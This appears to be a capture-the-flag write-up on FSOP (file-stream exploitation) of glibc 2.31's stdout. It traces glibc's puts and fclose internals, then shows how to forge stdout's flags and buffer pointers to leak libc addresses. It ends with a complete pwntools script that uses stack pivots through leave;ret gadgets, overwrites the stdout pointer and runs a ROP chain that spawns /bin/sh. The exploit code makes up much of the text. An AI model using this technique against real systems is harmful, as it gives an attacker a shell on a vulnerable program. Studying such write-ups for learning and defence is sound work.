FSOP stdout
fclose()
→ __IO_new_fclose
#define fclose(fp) _IO_new_fclose (fp)
src (glibc-2.31)
int
_IO_new_fclose (FILE *fp)
{
int status;
CHECK_FILE(fp, EOF);
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
/* We desperately try to help programs which are using streams in a
strange way and mix old and new functions. Detect old streams
here. */
if (_IO_vtable_offset (fp) != 0)
return _IO_old_fclose (fp);
#endif
/* First unlink the stream. */
if (fp->_flags & _IO_IS_FILEBUF)
_IO_un_link ((struct _IO_FILE_plus *) fp);
_IO_acquire_lock (fp);
if (fp->_flags & _IO_IS_FILEBUF)
status = _IO_file_close_it (fp);
else
status = fp->_flags & _IO_ERR_SEEN ? -1 : 0;
_IO_release_lock (fp);
_IO_FINISH (fp);
if (fp->_mode > 0)
{
/* This stream has a wide orientation. This means we have to free
the conversion functions. */
struct _IO_codecvt *cc = fp->_codecvt;
__libc_lock_lock (__gconv_lock);
__gconv_release_step (cc->__cd_in.step);
__gconv_release_step (cc->__cd_out.step);
__libc_lock_unlock (__gconv_lock);
}
else
{
if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
}
_IO_deallocate_file (fp);
return status;
}
Control Flow:
fp
through CHECK_FILE(fp, EOF);
_IO_old_fclose
_IO_un_link
_IO_FINISH
scr (glibc-2.31)
void
_IO_un_link (struct _IO_FILE_plus *fp)
{
if (fp->file._flags & _IO_LINKED)
{
FILE **f;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
run_fp = (FILE *) fp;
_IO_flockfile ((FILE *) fp);
#endif
if (_IO_list_all == NULL)
;
else if (fp == _IO_list_all)
_IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
else
for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
if (*f == (FILE *) fp)
{
*f = fp->file._chain;
break;
}
fp->file._flags &= ~_IO_LINKED;
#ifdef _IO_MTSAFE_IO
_IO_funlockfile ((FILE *) fp);
run_fp = NULL;
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
}
}
Control Flow:
_flags = 0x0080
then doing the below stufffp == _IO_list_all
→ _IO_list_all
point to the next fp in _chain_IO_list_all
, if found fp then remove itfp->file._flags &= ~_IO_LINKED
_IO_file_close_it
→_IO_new_file_close_it
src (glibc-2.31)
int
_IO_new_file_close_it (FILE *fp)
{
int write_status;
if (!_IO_file_is_open (fp))
return EOF;
if ((fp->_flags & _IO_NO_WRITES) == 0
&& (fp->_flags & _IO_CURRENTLY_PUTTING) != 0)
write_status = _IO_do_flush (fp);
else
write_status = 0;
_IO_unsave_markers (fp);
int close_status = ((fp->_flags2 & _IO_FLAGS2_NOCLOSE) == 0
? _IO_SYSCLOSE (fp) : 0);
/* Free buffer. */
if (fp->_mode > 0)
{
if (_IO_have_wbackup (fp))
_IO_free_wbackup_area (fp);
_IO_wsetb (fp, NULL, NULL, 0);
_IO_wsetg (fp, NULL, NULL, NULL);
_IO_wsetp (fp, NULL, NULL);
}
_IO_setb (fp, NULL, NULL, 0);
_IO_setg (fp, NULL, NULL, NULL);
_IO_setp (fp, NULL, NULL);
_IO_un_link ((struct _IO_FILE_plus *) fp);
fp->_flags = _IO_MAGIC|CLOSED_FILEBUF_FLAGS;
fp->_fileno = -1;
fp->_offset = _IO_pos_BAD;
return close_status ? close_status : write_status;
}
Control Flow :
_IO_NO_WRITES
(0x0008)_IO_CURRENTLY_PUTTING
_IO_do_flush
to flush the buffer and initialize the pointers_IO_FLAGS2_NOCLOSE]
(32) → _IO_SYSCLOSE
(__close
in vtable)puts
→ _IO_puts
src
int
_IO_puts (const char *str)
{
int result = EOF;
size_t len = strlen (str);
_IO_acquire_lock (stdout);
if ((_IO_vtable_offset (stdout) != 0
|| _IO_fwide (stdout, -1) == -1)
&& _IO_sputn (stdout, str, len) == len
&& _IO_putc_unlocked ('\n', stdout) != EOF)
result = MIN (INT_MAX, len + 1);
_IO_release_lock (stdout);
return result;
}
Note that in the scr code, it will call _IO_sputn
which mean that __xsputn
from vtable of stdout will be call
(_IO_FILE_plus)_IO_2_1_stdout→vtable.__xsputn(stdout, str, len)
_IO_new_file_xsputn
src
size_t
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (const char *) data;
size_t to_do = n;
int must_flush = 0;
size_t count = 0;
if (n <= 0)
return 0;
/* This is an optimized implementation.
If the amount to be written straddles a block boundary
(or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
else if (f->_IO_write_end > f->_IO_write_ptr)
count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
/* Then fill the buffer. */
if (count > 0)
{
if (count > to_do)
count = to_do;
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
to_do -= count;
}
if (to_do + must_flush > 0)
{
size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
}
Control Flow :
f->_IO_write_ptr
= __mempcpy (f->_IO_write_ptr)
_IO_OVERFLOW
is called_IO_default_xsputn
to write→ we focus on_IO_OVERFLOW
_IO_new_file_overflow
scr
int
_IO_new_file_overflow (FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup,
f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
if (_IO_do_flush (f) == EOF)
return EOF;
*f->_IO_write_ptr++ = ch;
if ((f->_flags & _IO_UNBUFFERED)
|| ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
if (_IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base) == EOF)
return EOF;
return (unsigned char) ch;
}
Control Flow:
check the file is writable : if (f->_flags & _IO_NO_WRITES
checking stuff
finally, if ch = EOF
call _IO_do_write
→ note _IO_do_write
_IO_do_write
src
int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
return (to_do == 0
|| (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
new_do_write
scr
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do);
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}
It will call _IO_SYSWRITE
in our exploit, it is a leak.
overwrite vtable and put appropriate address that we want to call in the vtable struct
Analysis :
__flags have 4 bytes
first 2 byte is _IO_MAGIC
(0xFBAD0000
)
the rest is flags
all flags
/* Magic number and bits for the _flags field. The magic number is
mostly vestigial, but preserved for compatibility. It occupies the
high 16 bits of _flags; the low 16 bits are actual flag bits. */
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED 0x0002
#define _IO_NO_READS 0x0004 /* Reading not allowed. */
#define _IO_NO_WRITES 0x0008 /* Writing not allowed. */
#define _IO_EOF_SEEN 0x0010
#define _IO_ERR_SEEN 0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close. */
#define _IO_LINKED 0x0080 /* In the list of all open files. */
#define _IO_IN_BACKUP 0x0100
#define _IO_LINE_BUF 0x0200
#define _IO_TIED_PUT_GET 0x0400 /* Put and get pointer move in unison. */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
/* 0x4000 No longer used, reserved for compat. */
#define _IO_USER_LOCK 0x8000
→ we need to note _IO_CURRENTLY_PUTTING
(0x800) and _IO_IS_APPENDING
(0x1000)
From the vtable, we need to note:
puts
→ __IO_puts
→ _IO_new_file_xsputn
→ _IO_new_file_overflow
→ _IO_do_write
_IO_do_write
→ _IO_new_do_write
→ new_do_write
finally it will call _IO_SYSWRITE(f, f→_IO_write_base, f→_IO_write_ptr - f→_IO_write_base)
→ output stdout→_IO_write_base
with length of f→_IO_write_ptr - f→_IO_write_base
to stdout
To-do :
need to bypass 2 if statements in _IO_new_file_overflow
:
first :
if (f->_flags & _IO_NO_WRITES)
→ _flags ≠ _IO_NO_WRITES
(0x0008)
second :
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
→ flags = _IO_CURRENTLY_PUTTING
(0x800) or _IO_write_base
≠ NULL
bypass another if statements in new_do_write
:
if (fp->_flags & _IO_IS_APPENDING)
→ _flag = _IO_IS_APPENDING
(0x1000)
_flag
to 0xfbad1800
_IO_read_ptr
, _IO_read_end
, _IO_read_base
, _IO_write_base
to the ptr that have an address we want to leak_IO_write_ptr
, _IO_write_end
, _IO_buf_base
, _IO_buf_end
to ptr + x
(it will leak x byte). That ptr must in read and writable address.We are given a simple binary
But we dont have pop rdi gadget
We cannot do ret2dlresolve due to Full Relro. ret2csu is also impossible to do. So we will do some special techniques. After that ctf end, people mostly solved it in three ways :
I will use fsop in this exploit.
We will do that in three part :
This is just a very simple process. Note that i use a very high address (bss + 0x400)
payload = b'a'*32+p64(exe.bss()+0x400 + 0x20)+p64(exe.sym['main']+42)
sl(payload)
payload = b'a'*32+p64(0x404200+0x20)+p64(exe.sym['main']+42)
sl(payload)
This is the hard part. The big question in this step is how to overwrite the stdout ptr. My idea is use the leave, ret
gadget.
EX : rsp = a , rbp = b (b is point to c). Now when we call leave, ret
it will become rsp = b+8, rbp = c.
Using the above example, we can utilize it to make the rbp point to that stdout ptr. But here is one big problem : the stdout ptr is store in 0x404010
which is the beginning of the bss. So when we call gets
it will get sigsegv because libc will push something to our bss() and at some point it will go to some uninitialized address.
So how to bypass it ?. This make me stuck for a very long time. After all, i realised when call puts
(with our rsp is now point to bss) the bss will have stdout address !. By using stack cached we can bypass the above problem (using another address not 0x404010).
Another problem is when we do the leave, ret
to overwrite the new stdout ptr addr1
, our rsp ptr will now point to addr1 + 8
and will look for address to return. So before overwrite that new ptr, we must overwrite addr1 + 8
to point to some useful ropchain in our program.
More problem appear !!!. After we overwrite that ptr, and puts leak the libc. The leave, ret instruction will execute again ! and will make our rsp point to some location in the libc (writable of course) so we must also overwrite it to new ropchain. In order to do that and not overwrite the vtable, we must partial overwrite lower address of addr1
to \x00
Now we can fsop by :
_flag
to 0xfbad1800
_IO_read_ptr
, _IO_read_end
, _IO_read_base
, _IO_write_base
to got table (any function you like)_IO_write_ptr
, _IO_write_end
, _IO_buf_base
, _IO_buf_end
to ptr
(that ptr
must be the bss to make it writable )This is the final step, and with the libc we can easily get shell
poprdi = libc.address + 0x000000000002a3e5
poprsi = libc.address + 0x000000000002be51
poprdx = libc.address + 0x00000000000796a2
poprax = libc.address + 0x0000000000045eb0
syscall = libc.address + 0x0000000000029db4
payload = b'a'*32+b'b'*8+p64(poprdi)+p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(poprsi)+p64(0)+p64(poprdx)+p64(0)+p64(poprax)+p64(0x3b)+p64(syscall)
sl(payload)
ptr1
ptr1
to \x00
ptr1+8
to ropchainScript :
import sys
from pwn import *
context.binary = exe = ELF("chall_patched")
libc = ELF("libc.so.6")
if (args.REMOTE):
p = remote()
else :
p = process(exe.path)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
if (args.GDB):
gdb.attach(p,
"""
b*0x00000000004011bb
b*0x00000000004011c6
c
""")
input()
poprbp = 0x000000000040115d
leave = 0x00000000004011c5
addrsp = 0x0000000000401016
ret = 0x000000000040101a
fake_file = p64(0xfbad1800)+p64(0x403fe8)*4+p64(exe.bss()+0x50)*4
payload = b'a'*32+p64(exe.bss()+0x400 + 0x20)+p64(exe.sym['main']+42)
sl(payload)
payload = b'a'*32+p64(0x404200+0x20)+p64(exe.sym['main']+42)
sl(payload)
payload = b'a'*32+p64(0x404340+8+0x20)+p64(exe.sym['main']+42)
sl(payload)
payload = b'a'*32+p64(0x404378+8+0x20)+p64(exe.sym['main']+42)
sl(payload)
payload = p64(0x4011a0)*4 + p64(0x404378) + p64(leave)
sl(payload)
payload = b'\x00'*32 + p64(exe.bss()+0x100) + p64(exe.sym['main']+42)+b'\x00'*112+ fake_file
sl(payload)
for i in range(0,5):
p.recvline()
leak = u64(p.recvn(8))
libc.address = leak - libc.sym['setvbuf']
print("leak : ",hex(leak))
print("base : ",hex(libc.address))
poprdi = libc.address + 0x000000000002a3e5
poprsi = libc.address + 0x000000000002be51
poprdx = libc.address + 0x00000000000796a2
poprax = libc.address + 0x0000000000045eb0
syscall = libc.address + 0x0000000000029db4
payload = b'a'*32+b'b'*8+p64(poprdi)+p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(poprsi)+p64(0)+p64(poprdx)+p64(0)+p64(poprax)+p64(0x3b)+p64(syscall)
sl(payload)
p.interactive()